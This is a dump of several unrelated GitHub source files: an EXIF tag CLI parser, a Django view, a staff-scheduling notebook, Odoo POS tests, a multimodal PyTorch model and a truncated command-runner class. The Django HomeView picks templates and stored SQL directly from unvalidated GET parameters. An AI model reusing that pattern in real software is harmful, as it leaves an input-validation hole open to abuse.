+{"seq_id":"1510056489","text":"# -*- coding: utf-8 -*-\nfrom enum import Enum\nfrom typing import List\n\nfrom lib.query import MatchType\n\nUSAGE_STRING = \"\"\"Usage: tie.py action [tags] [options]\n\nTie is an acronym for \"tags in exif-data\". \nIt \"ties\" tags to image files using exif data fields while also maintaining a symlink-based index of tagged files for \nquerying purposes.\n\n\nACTIONS:\n help: print this help\n query: query for files with specified tags\n list: list all tags present on the specified files\n tag: add specified tag to specified file(s)\n untag: remove specified tag from specified file(s)\n clear: clear all tags from specified file(s)\n index: update the index for the specied file(s)\n\nAll actions may be called with their full name or just their initial character.\nIn other words, the following two commands are equivalent:\n\n tie.py help\n tie.py h\n\n\nOPTIONS:\n -f, --files file_1 [file_2 ... ]\n Specifies the files to apply the chosen action to.\n If this option is omitted and the specified action requires a specification of target files, the last \n argument will be treated as a file argument. \n In this case no other options may follow the file specification.\n\n -F, --frontend batch|yes|cli|gtk\n Chooses the frontend. The default is cli. Possible choices:\n batch: Non-interactive mode suitable for scripts. The answer to yes/no questions is aways \"no\".\n yes: Behaves as the batch frontend but always answers yes/no questions with \"yes\".\n cli: Interactive command line interface.\n gtk: Graphical user interface. Requires a running X session and gtk.\n \n -m, --match-type all|any\n Only applicable for the query action. Specifies whether to query for files that contain all or any of the\n specified tags, respectively.\n\n\nDepending on the chosen action, tags must be specified. All non-option-arguments that are provided after the action \nargument and before the files specification are interpreted as tags.\n\n\nCONFIGURATION:\nThe default configuration file path is $HOME/.tie.ini\nThis location can be overridden by setting the environment variable TIE_CONFIG_PATH to the desired path.\nThe syntax follows the .ini file format. See more detailed description and example below.\n\nThe following settings can be configured:\n \n exif_field:\n The exif field that is used to store and retrieve tag data. Defaults to \"Exif.Photo.UserComment\"\n \n index_path:\n The path to the directory where the symlink-based index is stored. 
Defaults to $HOME/.tie/\n\n\nEXAMPLES:\n Querying:\n tie query tag\n \n Querying for tags with white spaces:\n tie query 'tag 1' 'tag 2'\n\n Querying with short form for action:\n tie q tag\n \n Interactive querying in default (cli) frontend:\n tie query\n\n Interactive querying in gtk frontend:\n tie query --frontend gtk\n \n Listing tags\n tie list -f /path/to/file1 [/path/to/file2..]\n \n Tagging one file\n tie tag tag1 tag2 /path/to/file1\n \n Tagging multiple files with the same tags\n tie tag tag1 tag2 --files /path/to/file1 [/path/to/file2..]\n \n Untagging\n tie untag tag1 tag2 --files /path/to/file1 [/path/to/file2..]\n \n Clearing all tags\n tie clear --files /path/to/file1 [/path/to/file2..]\n \n Updating the index\n tie index --files /path/to/file1 [/path/to/file2..]\n \n Example configuration file with current default values:\n [GENERAL]\n index_path = /home/foo/.tie/\n [EXIV2]\n exif_field = Exif.Photo.UserComment\n charset = UTF-8\n quiet = yes\n keep_time_stamps = yes\n\"\"\"\n\n\nclass ParsingStage(Enum):\n action = 1\n tags = 2\n files = 3\n\n\nclass Action(Enum):\n help = 1\n query = 2\n list = 3\n tag = 4\n untag = 5\n clear = 6\n index = 7\n\n\n_short_actions = {\n 'h': Action.help,\n 'q': Action.query,\n 'l': Action.list,\n 't': Action.tag,\n 'u': Action.untag,\n 'c': Action.clear,\n 'i': Action.index,\n}\n\n\nclass FrontendType(Enum):\n batch = 1\n yes = 2\n cli = 3\n gtk = 4\n\n\nclass Option:\n def __init__(self, short: str, long: str):\n self.short = short\n self.long = long\n\n def matches(self, arg: str) -> bool:\n return arg == self.short or arg == self.long\n\n\nclass ParseError(Exception):\n def __init__(self, msg: str):\n self.msg = msg\n\n\nclass RunOptions:\n def __init__(self, args: List[str]):\n \"\"\"\n :raises ParseError if the provided args are invalid\n \"\"\"\n self.action: Action = None\n self.tags: List[str] = []\n self.files: List[str] = []\n self.match_type: MatchType = MatchType.all\n self.frontend: FrontendType = None\n self._parse(args)\n self._check_action_type()\n self._check_files_count()\n if self.frontend is None:\n self.frontend = FrontendType.cli\n\n def _parse(self, args: List[str]):\n parsing_stage = ParsingStage.action\n\n while len(args) > 0:\n arg = args.pop(0)\n\n if parsing_stage == ParsingStage.tags and _requires_files(self.action) and len(args) == 0:\n parsing_stage = ParsingStage.files\n\n if _is_option(arg):\n if Option(\"-f\", \"--files\").matches(arg):\n parsing_stage = ParsingStage.files\n elif Option(\"-F\", \"--frontend\").matches(arg):\n self.frontend = _parse_frontend_type(args)\n elif Option(\"-m\", \"--match-type\").matches(arg):\n self.match_type = _parse_match_type(args)\n else:\n raise ParseError(\"Unknown option \"+arg)\n elif parsing_stage == ParsingStage.action:\n self.action = _parse_action(arg)\n if self.needs_tags():\n parsing_stage = ParsingStage.tags\n else:\n parsing_stage = ParsingStage.files\n elif parsing_stage == ParsingStage.tags:\n self.tags.append(arg)\n elif parsing_stage == ParsingStage.files:\n self.files.append(arg)\n\n def needs_tags(self) -> bool:\n if len(self.tags) > 0:\n return False\n return self.action in [Action.query, Action.tag, Action.untag]\n\n def allows_tag_creation(self) -> bool:\n return self.action == Action.tag\n\n def _check_action_type(self):\n if self.action is None:\n raise ParseError(\"Action type must be specified!\")\n\n def _check_files_count(self):\n actual_file_count = len(self.files)\n\n if self.action in [Action.list, Action.tag, Action.untag, Action.clear, 
Action.index] and actual_file_count < 1:\n            raise ParseError(\"Unexpected files count \" + str(actual_file_count) +\n                             \" (expected 1 or more) for action type \\\"\" + self.action.name + \"\\\"\")\n        elif self.action == Action.query and actual_file_count > 0:\n            raise ParseError(\"Unexpected files count \" + str(actual_file_count) +\n                             \" (expected 0) for action type \\\"\" + self.action.name + \"\\\"\")\n\n\ndef _parse_match_type(args):\n    if len(args) == 0:\n        raise ParseError(\"Argument missing for option --match-type!\")\n    arg = args.pop(0)\n    try:\n        return MatchType[arg]\n    except KeyError:\n        raise ParseError(\"Invalid match type \" + arg)\n\n\ndef _parse_frontend_type(args):\n    if len(args) == 0:\n        raise ParseError(\"Argument missing for option --frontend!\")\n    # pop the argument only once: popping again inside the except handler would consume the wrong argument\n    arg = args.pop(0)\n    try:\n        return FrontendType[arg]\n    except KeyError:\n        raise ParseError(\"Invalid frontend type \" + arg)\n\n\ndef _parse_action(action_name):\n    if action_name in _short_actions:\n        return _short_actions[action_name]\n    else:\n        try:\n            return Action[action_name]\n        except KeyError:\n            raise ParseError(\"Invalid action type: \" + action_name)\n\n\ndef _is_option(arg: str):\n    return arg.startswith(\"-\")\n\n\ndef _requires_files(action):\n    return action in [Action.list, Action.tag, Action.untag, Action.clear, Action.index]\n\n\n","repo_name":"enguerrand/tie","sub_path":"lib/options_parser.py","file_name":"options_parser.py","file_ext":"py","file_size_in_byte":8096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"16349995449","text":"from django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db import connection\n\nfrom lib.common import AppUtil\n\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = 'home.html'\n\n # パラメータによってテンプレートを変更する\n def get_template_names(self):\n\n # アプリケーション名取得\n if \"app_name\" in self.request.GET:\n app_name = self.request.GET.get(\"app_name\")\n else:\n app_name = \"base\"\n\n # テンプレート名取得\n if \"template_name\" in self.request.GET:\n template_name = app_name + \"/\" + self.request.GET.get(\"template_name\") + \".html\"\n else:\n template_name = \"home.html\"\n \n return [template_name]\n\n @staticmethod\n def dictfetchall(cursor):\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\n #変数を渡す\n def get_context_data(self,**kwargs):\n context = super().get_context_data(**kwargs)\n\n # アプリケーション名取得\n if \"app_name\" in self.request.GET:\n app_name = self.request.GET.get(\"app_name\")\n else:\n app_name = \"base\"\n\n # テンプレート名取得\n if \"template_name\" in self.request.GET:\n template_name = self.request.GET.get(\"template_name\")\n else:\n template_name = \"home\"\n\n # パラメータで指定されたSQLを実行し結果を取得する\n with connection.cursor() as cursor:\n sql = AppUtil.get_sql(app_name, template_name)\n cursor.execute(sql)\n items = HomeView.dictfetchall(cursor)\n \n context[\"items\"] = items\n\n return context\n","repo_name":"nissato-hitoshi/docker-django_mysql","sub_path":"src/base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38972236394","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[16]:\n\n\nget_ipython().system(' pip install pulp')\n\n\n# In[17]:\n\n\nimport pandas as pd\nfrom pulp import *\nimport matplotlib.pyplot as plt\nfrom itertools import chain, repeat\n\n\n# In[18]:\n\n\ndef ncycles(iterable, n):\n \"Returns the sequence elements n times\"\n return chain.from_iterable(repeat(tuple(iterable), n))\n\n\n# In[19]:\n\n\nn_staff = [31, 45, 40, 40, 48, 30, 25]\njours = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n# Staff\ndf_staff = pd.DataFrame({'Days': jours, 'Staff Demand':n_staff})\ndf_staff[['Days', 'Staff Demand']].plot.bar(x='Days', figsize = (30, 10), fill=True, color='black')\nplt.title('Workforce Ressources Demand by Day')\nplt.xlabel('Day of the week')\nplt.ylabel('Number of Workers')\nplt.show()\n\n\n# In[20]:\n\n\n# Create circular list of days\nn_days = [i for i in range(7)]\nn_days_c = list(ncycles(n_days, 3)) \n\n# Working days\nlist_in = [[n_days_c[j] for j in range(i , i + 5)] for i in n_days_c]\n\n# Days off\nlist_excl = [[n_days_c[j] for j in range(i + 1, i + 3)] for i in n_days_c]\n\n\n# In[21]:\n\n\n# The class has been initialize, and x, and days defined\nmodel = LpProblem(\"Minimize Staffing\", LpMinimize)\n\n# Create Variables\nstart_jours = ['Shift: ' + i for i in jours]\nx = LpVariable.dicts('shift_', n_days, lowBound=0, cat='Integer')\n\n# Define Objective\nmodel += lpSum([x[i] for i in n_days])\n\n# Add constraints\nfor d, l_excl, staff in zip(n_days, list_excl, n_staff):\n model += lpSum([x[i] for i in n_days if i not in l_excl]) >= staff\n\n# Solve Model\nmodel.solve()\n\n# The status of the solution is printed to the screen\nprint(\"Status:\", LpStatus[model.status])\n\n\n# In[22]:\n\n\n# How many workers per day ?\ndct_work = {}\ndico_work = {}\nfor v in model.variables():\n dct_work[int(v.name[-1])] = int(v.varValue)\n dico_work[v.name] = int(v.varValue)\ndico_work\n\n\n# In[23]:\n\n\n# Show workers schedule\ndict_sch = {}\nfor day in dct_work.keys():\n dict_sch[day] = [dct_work[day] if i in list_in[day] else 0 for i in n_days]\ndf_sch = pd.DataFrame(dict_sch).T\ndf_sch.columns = jours\ndf_sch.index = start_jours\n# The optimized objective function value is printed to the screen\nprint(\"Total number of Staff = \", pulp.value(model.objective))\n\n\n# In[24]:\n\n\n# Detailed\ndf_sch\n\n\n# In[25]:\n\n\n# Sum by day\ndf_sch.sum(axis =0)\n\n\n# In[26]:\n\n\ndf_supp = df_staff.copy().set_index('Days')\ndf_supp['Staff Supply'] = df_sch.sum(axis = 0)\ndf_supp['Extra_Ressources'] = df_supp['Staff Supply'] - df_supp['Staff Demand']\ndf_supp.to_csv('test.csv')\n\n\n# In[27]:\n\n\n# Staff\nax = df_supp.plot.bar(y=['Staff Demand', 'Staff Supply'], figsize = (30, 10), fill=True, color=['black', 'red'])\ndf_supp.plot(y=['Extra_Ressources'], color=['blue'], secondary_y = True, ax = ax, linewidth = 3)\nplt.title('Workforce: Demand vs. Supply')\nplt.xlabel('Day of the week')\nplt.ylabel('Number of Workers')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"PeddintiRajshekhar/Project-1","sub_path":"project 1.py","file_name":"project 1.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70748574491","text":"from typing import List, Union\n\nfrom pydantic import BaseModel\n\nclass User(BaseModel):\n authtoken: str\n refreshtoken: str\n idtoken: str\n admin_id: int\n app_id: int\n action: str\n chain_id: int\n lang: str\n class Config:\n from_attributes = True\n\n\n","repo_name":"rob-vandam/baseProject","sub_path":"app/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22966115103","text":"n = int(input())\nlistA = list(map(int, input().split()))\n\nmemo = {}\n\ndef solve(mon, i, haveN):\n key = str(mon) + \" \" + str(i) + \" \" + str(haveN)\n if key in memo:\n return memo[key]\n if i >= len(listA):\n memo[key] = 0\n return memo[key]\n elif i == len(listA)-1:\n mon+=haveN*listA[i]\n haveN=0\n memo[key] = mon\n return memo[key]\n else:\n memo[key] = max(solve(mon, i+1, haveN), solve(mon-listA[i]*(mon//listA[i]), i+1, haveN+mon//listA[i]), solve(mon+haveN*listA[i], i+1, 0))\n return memo[key]\n \nprint(solve(1000, 0, 0))\n \n","repo_name":"p623/programming_contest","sub_path":"mSolution/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"22938112287","text":"from datetime import datetime\n\nfrom odoo import fields\nfrom odoo.tests import SavepointCase\n\n\nclass TestL10nBrPosOrder(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.env.company = cls.env.ref(\"l10n_br_base.empresa_lucro_presumido\")\n cls.pos_config = cls.env.ref(\"l10n_br_pos.pos_config_presumido\")\n cls.cash_payment_method = cls.env.ref(\"l10n_br_pos.presumido_dinheiro\")\n cls.led_lamp = cls.env[\"product.product\"].create(\n {\n \"name\": \"LED Lamp\",\n \"available_in_pos\": True,\n \"list_price\": 0.90,\n }\n )\n\n def compute_tax(self, product, price, qty=1, taxes=None):\n if not taxes:\n taxes = product.taxes_id.filtered(\n lambda t: t.company_id.id == self.env.company.id\n )\n currency = self.pos_config.pricelist_id.currency_id\n res = taxes.compute_all(price, currency, qty, product=product)\n untax = res[\"total_excluded\"]\n return untax, sum(tax.get(\"amount\", 0.0) for tax in res[\"taxes\"])\n\n def _generate_order(self):\n current_session = self.pos_config.current_session_id\n untax, atax = self.compute_tax(self.led_lamp, 0.9)\n generic_order = {\n \"data\": {\n \"amount_paid\": untax + atax,\n \"amount_return\": 0,\n \"amount_tax\": atax,\n \"amount_total\": untax + atax,\n \"creation_date\": fields.Datetime.to_string(fields.Datetime.now()),\n \"fiscal_position_id\": False,\n \"pricelist_id\": self.pos_config.available_pricelist_ids[0].id,\n \"lines\": [\n [\n 0,\n 0,\n {\n \"discount\": 0,\n \"id\": 42,\n \"pack_lot_ids\": [],\n \"price_unit\": 0.9,\n \"product_id\": self.led_lamp.id,\n \"price_subtotal\": 0.9,\n \"price_subtotal_incl\": 1.04,\n \"qty\": 1,\n \"tax_ids\": [(6, 0, self.led_lamp.taxes_id.ids)],\n },\n ]\n ],\n \"name\": \"Order 00042-003-0014\",\n \"partner_id\": False,\n \"pos_session_id\": current_session.id,\n \"sequence_number\": 2,\n \"statement_ids\": [\n [\n 0,\n 0,\n {\n \"amount\": untax + atax,\n \"name\": fields.Datetime.now(),\n \"payment_method_id\": self.cash_payment_method.id,\n },\n ]\n ],\n \"uid\": \"00042-003-0014\",\n \"user_id\": self.env.uid,\n },\n \"id\": \"00042-003-0014\",\n \"to_invoice\": False,\n \"authorization_date\": datetime.fromisoformat(\"2022-01-01T12:00:00\"),\n \"document_number\": \"123456\",\n \"document_key\": \"Cfe35181104113837000100590001128550021551657445\",\n \"document_type_id\": 33,\n \"document_session_number\": 123456,\n \"document_serie\": \"123456789\",\n \"fiscal_operation_id\": 1,\n \"status_code\": \"06000\",\n \"status_name\": \"Autorizado o Uso do CF-e\",\n \"state_edoc\": \"autorizada\",\n }\n self.env[\"pos.order\"].create_from_ui([generic_order])\n\n def test_create_from_ui_l10n_brazil(self):\n orders_exported_to_ui = []\n\n self.pos_config.open_session_cb(check_coa=False)\n\n current_session = self.pos_config.current_session_id\n num_starting_orders = len(current_session.order_ids)\n\n self._generate_order()\n\n for order in current_session.order_ids:\n orders_exported_to_ui.append(order.export_for_ui())\n\n self.assertEqual(\n num_starting_orders + 1,\n len(current_session.order_ids),\n \"Submitted order not encoded\",\n )\n\n self.assertEqual(\n 1,\n len(orders_exported_to_ui),\n \"Orders not exported to UI.\",\n )\n\n def test_cancel_l10n_brazil(self):\n self.pos_config.open_session_cb(check_coa=False)\n current_session = self.pos_config.current_session_id\n num_starting_orders = len(current_session.order_ids)\n\n self._generate_order()\n order = current_session.order_ids[0]\n\n order_data = {\n \"order_id\": order.id,\n 
\"numSessao\": 123456,\n \"chave_cfe\": \"Cfe35181104113837000100590001128550021551657445\",\n \"xml\": \"dGVzdGVfY2FuY2VsX2Zsb3c=\",\n }\n order.cancel_order(order_data)\n self.assertEqual(\n num_starting_orders + 2,\n len(current_session.order_ids),\n \"Cancelled order not encoded\",\n )\n","repo_name":"OCA/l10n-brazil","sub_path":"l10n_br_pos/tests/test_l10n_br_pos_order.py","file_name":"test_l10n_br_pos_order.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"32"}
+{"seq_id":"30892006328","text":"import logging\n\nfrom django.db import migrations\n\nlogger = logging.getLogger(__name__)\n\n\ndef init_source_type_specs(apps, schema_editor):\n \"\"\"初始化代码库配置(BareGit, BaseSVN)\"\"\"\n SourceTypeSpecConfig = apps.get_model('sourcectl', 'SourceTypeSpecConfig')\n\n logger.info(\"初始化 BareGit 代码库配置\")\n SourceTypeSpecConfig.objects.create(\n name='bare_git', label_en='BareGit', label_zh_cn='原生 Git', enabled=True,\n spec_cls='paasng.platform.sourcectl.type_specs.BareGitSourceTypeSpec'\n )\n\n logger.info(\"初始化 BareSVN 代码库配置\")\n SourceTypeSpecConfig.objects.create(\n name='bare_svn', label_en='BareSVN', label_zh_cn='原生 SVN', enabled=True,\n spec_cls='paasng.platform.sourcectl.type_specs.BareSvnSourceTypeSpec'\n )\n logger.info(\"初始化代码库配置完成\")\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('sourcectl', '0006_sourcetypespecconfig'),\n ]\n\n operations = [\n migrations.RunPython(init_source_type_specs),\n ]\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/platform/sourcectl/migrations/0007_init_source_type_specs.py","file_name":"0007_init_source_type_specs.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"}
+{"seq_id":"40304932336","text":"import torch\nfrom torch import nn\nfrom pytorch_lightning.core.module import LightningModule\nfrom torch.nn import functional as F\nfrom monai.networks.nets import resnet10, resnet18, resnet34, resnet50\nfrom settings import IMAGE_SIZE, FEATURES, BATCH_SIZE, TARGET\nimport torchmetrics\nimport pandas as pd\nfrom transformers import AutoTokenizer, AutoModel\nimport os\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\n\nclass MultiModModelWithLanguage(LightningModule):\n '''\n Resnet Model Class including the training, validation and testing steps\n '''\n\n def __init__(self, class_weight, scaler):\n\n super().__init__()\n\n self.class_weight = class_weight\n\n self.scaler = scaler\n\n self.resnet = resnet10(pretrained=False,\n spatial_dims=3,\n num_classes=120,\n n_input_channels=1\n )\n\n self.tokenizer = AutoTokenizer.from_pretrained('michiyasunaga/BioLinkBERT-base',\n cache_dir=\"/scratch/users/paschali/\")\n self.language_model = AutoModel.from_pretrained('michiyasunaga/BioLinkBERT-base',\n cache_dir=\"/scratch/users/paschali/\")\n \n # Freeze weights so those don't get trained \n for param in self.language_model.parameters():\n param.requires_grad = False\n\n\n self.NUM_FEATURES = len(FEATURES)\n\n # self.NUM_FEATURES = 0\n\n # fc layer to make image size same as tabular data size\n # self.fc = nn.Linear(400, 1)\n\n # combine resnet with final fc layer\n # self.imagenet = nn.Sequential(self.resnet, self.fc)\n # fc layer that maps language model inputs to smaller dimension\n self.language_fc = nn.Linear(768, 120)\n\n # fc layer for tabular data. We substract 2 because age and sex are encoded as sentences\n self.fc1 = nn.Linear((self.NUM_FEATURES - 2), 120)\n\n # first fc layer which takes concatenated input\n self.fc2 = nn.Linear((120 + 120 + 120), 32)\n\n # final fc layer which takes concatenated imput\n self.fc3 = nn.Linear(32, 1)\n\n self.train_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.val_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.test_macro_accuracy = torchmetrics.Accuracy(task='multiclass', average='macro', num_classes=2)\n\n self.train_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.val_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.test_accuracy = torchmetrics.Accuracy(task='multiclass', average='micro', num_classes=2)\n\n self.results_column_names = ['subject', 'label', 'prediction', 'age', 'sex']\n\n self.train_results_df = pd.DataFrame(columns=self.results_column_names)\n\n self.train_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.val_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.val_results_df = pd.DataFrame(columns=self.results_column_names)\n\n def forward(self, img, tab):\n \"\"\"\n\n x is the input data\n\n \"\"\"\n # run the model for the image\n self.language_model = self.language_model.to('cuda')\n # self.tokenizer = self.tokenizer\n \n # print(img.shape)\n img = torch.unsqueeze(img, 1)\n img = img.to(torch.float32)\n # print(img.type)\n # print(img.shape)\n img = self.resnet(img)\n \n batch_sentences = self.get_batch_sentences(tab)\n \n # change the dtype of the tabular data\n tab = tab.to(torch.float32)\n \n ind_to_keep = list(range(0, self.NUM_FEATURES))\n\n ind_to_keep.remove(2)\n\n ind_to_keep.remove(3)\n\n # Remove age and sex from tabular vector since we are using 
them as language model input\n tab_without_age_sex = tab[:,ind_to_keep]\n \n # forward tabular data\n tab_without_age_sex = F.relu(self.fc1(tab_without_age_sex))\n\n language_inputs = self.tokenizer(batch_sentences, return_tensors=\"pt\")\n \n language_inputs = language_inputs.to('cuda')\n\n language_outputs = self.language_model(**language_inputs)\n\n # 1 x 768\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token. We assume that this has been pre-trained\n pooled_states = language_outputs.pooler_output\n\n language_features_compressed = self.language_fc(pooled_states)\n\n # concat image, tabular data and data from language model\n x = torch.cat((img, tab_without_age_sex, language_features_compressed), dim=1)\n\n x = F.relu(self.fc2(x))\n\n out = self.fc3(x)\n\n out = torch.squeeze(out)\n\n return out\n\n def get_batch_sentences(self, tabular_to_encode):\n # return_tensors pt means pytorch\n tabular_to_encode = self.scaler.inverse_transform(tabular_to_encode.detach().cpu().numpy())\n\n batch_age = tabular_to_encode[:, 2]\n batch_sex = tabular_to_encode[:, 1]\n\n batch_sex_l = list(batch_sex)\n batch_age_l = list(batch_age.round(2))\n\n batch_sex_l = list(map(lambda x: 'female' if x == 0 else 'male', batch_sex_l))\n\n batch_pairs = list(zip(batch_sex_l, batch_age_l))\n\n batch_sentences = [\"This subject is \" + pair[0] + \" and \" + str(pair[1]) + \" years old\" for pair in batch_pairs]\n\n return batch_sentences\n\n def configure_optimizers(self):\n\n optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)\n\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[10, 20, 35, 50], gamma=0.8)\n\n lr_scheduler = {\n 'scheduler': scheduler,\n 'name': 'lr_logging'\n }\n\n return [optimizer], [lr_scheduler]\n\n def training_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n\n # img = torch.tensor(img).float()\n\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred, y.squeeze())\n\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n self.train_results_df['subject'] = tuple(subject_id)\n self.train_results_df['label'] = y.squeeze().detach().cpu().numpy()\n self.train_results_df['prediction'] = y_pred_tag.detach().cpu().numpy()\n\n tab_bef_normalization = self.scaler.inverse_transform(tab.detach().cpu().numpy())\n self.train_results_df['age'] = tab_bef_normalization[:, 2]\n self.train_results_df['sex'] = tab_bef_normalization[:, 1]\n\n self.train_results_df_all = pd.concat([self.train_results_df_all, self.train_results_df], ignore_index=True)\n\n if BATCH_SIZE == 1:\n self.train_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.train_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.train_accuracy(y_pred_tag, y)\n\n self.train_macro_accuracy(y_pred_tag, y)\n\n self.log('train_acc_step', self.train_accuracy, on_step=False, on_epoch=True)\n self.log('train_macro_acc_step', self.train_macro_accuracy, on_step=True, on_epoch=True)\n # Log loss\n self.log('train_loss', loss, on_step=True, on_epoch=True)\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred, y.squeeze())\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n self.val_results_df['subject'] = 
tuple(subject_id)\n self.val_results_df['label'] = y.squeeze().detach().cpu().numpy()\n self.val_results_df['prediction'] = y_pred_tag.detach().cpu().numpy()\n\n tab_bef_normalization = self.scaler.inverse_transform(tab.detach().cpu().numpy())\n self.val_results_df['age'] = tab_bef_normalization[:, 2]\n self.val_results_df['sex'] = tab_bef_normalization[:, 1]\n\n self.val_results_df_all = pd.concat([self.val_results_df_all, self.val_results_df], ignore_index=True)\n\n if BATCH_SIZE == 1:\n\n self.val_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.val_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.val_accuracy(y_pred_tag, y)\n\n self.val_macro_accuracy(y_pred_tag, y)\n\n self.log('val_acc_step', self.val_accuracy, on_step=False, on_epoch=True)\n self.log('val_macro_acc_step', self.val_macro_accuracy, on_step=True, on_epoch=True)\n\n # Log loss\n self.log('val_loss', loss, on_step=True, on_epoch=True)\n\n return loss\n\n def test_step(self, batch, batch_idx):\n\n img, tab, y, subject_id = batch\n y = y.to(torch.float32)\n\n y_pred = self(img, tab)\n\n loss_func = torch.nn.BCEWithLogitsLoss(pos_weight=torch.tensor(self.class_weight).float())\n\n loss = loss_func(y_pred,\n y.squeeze()) # loss = F.binary_cross_entropy(torch.sigmoid(y_pred), y.squeeze(), pos_weights = )\n\n y_pred_tag = torch.round(torch.sigmoid(y_pred))\n\n if BATCH_SIZE == 1:\n\n self.test_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n\n self.test_macro_accuracy(torch.unsqueeze(y_pred_tag, 0), y)\n else:\n self.test_accuracy(y_pred_tag, y)\n\n self.test_macro_accuracy(y_pred_tag, y)\n\n self.log('test_acc_step', self.test_accuracy, on_step=True, on_epoch=False)\n self.log('test_macro_acc_step', self.test_macro_accuracy, on_step=True, on_epoch=True)\n\n self.log(\"test loss\", loss)\n\n return loss\n\n def training_epoch_end(self, outs):\n\n filename_out = '/home/users/paschali/results/train_out_language_' + str(\n self.current_epoch) + '_' + TARGET + '_' + self.trainer.logger.experiment.name + '.csv'\n\n self.train_results_df_all.to_csv(filename_out)\n\n # Clear the dataframe so the new epoch can start fresh\n self.train_results_df_all = pd.DataFrame(columns=self.results_column_names)\n # log epoch metric\n self.log('train_acc_epoch', self.train_accuracy)\n self.log('train_macro_acc_epoch', self.train_macro_accuracy)\n\n def validation_epoch_end(self, outputs):\n # log epoch metric\n\n filename_out = '/home/users/paschali/results/val_out_language_' + str(\n self.current_epoch) + '_' + TARGET + '_' + self.trainer.logger.experiment.name + '.csv'\n\n self.val_results_df_all.to_csv(filename_out)\n\n # Clear the dataframe so the new epoch can start fresh\n self.val_results_df_all = pd.DataFrame(columns=self.results_column_names)\n\n self.log('val_acc_epoch', self.val_accuracy)\n self.log('val_macro_acc_epoch', self.val_macro_accuracy)\n\n","repo_name":"MaggiePas/NCANDA_Contrastive","sub_path":"multimodal/model_language.py","file_name":"model_language.py","file_ext":"py","file_size_in_byte":11222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"72162909850","text":"from ..Config import Configuration\nfrom ..commander import Commander\nfrom ..pretty_term import cprint\n\nclass WakeUp:\n \"\"\"Manage and run user defined commands from a single source\"\"\"\n def __init__(self, **kwargs):\n super().__init__()\n self.section_name = 'WAKEUP'\n self.config = Configuration()\n self._setup_check()\n\n def _create_default(self):\n self.config.set_entry(self.section_name, 'default', '0', True, False)\n self.config.set_entry(self.section_name, '0', \"echo 'Running default commands:'\", True, True)\n # If there were no errors in the previous lines then this should not error.\n err, sect = self.config.get_section(self.section_name)\n\n def _setup_check(self):\n \"\"\"Check that this has been setup, if not create defaults.\"\"\"\n err, sect = self.config.get_section(self.section_name)\n if err or 'default' not in sect:\n self._create_default()\n\n def get_config(self):\n err, sect = self.config.get_section(self.section_name)\n if err:\n self._create_default()\n return sect\n\n def _run_command(self, cmd, timeout):\n return Commander.run(\n cmd.get('command'),\n cmd.get('op_name', 'User command'),\n cmd.get('path'),\n cmd.get('env'),\n timeout)\n\n def _clean_command(self, cmd_string):\n # prevent recursion?\n if 'wakeup' in cmd_string or 'wake_up.py' in cmd_string:\n raise Exception(\"Sorry cannot run commands with 'wakeup' or 'wake_up.py' in order to prevent recursive behavior.\")\n else:\n # The _run_command function(from Commander.run) requires that the command be a list of strings \n return cmd_string.split(' ')\n\n def _process_command(self, cmd_key, timeout, config):\n # Runs an individual command\n 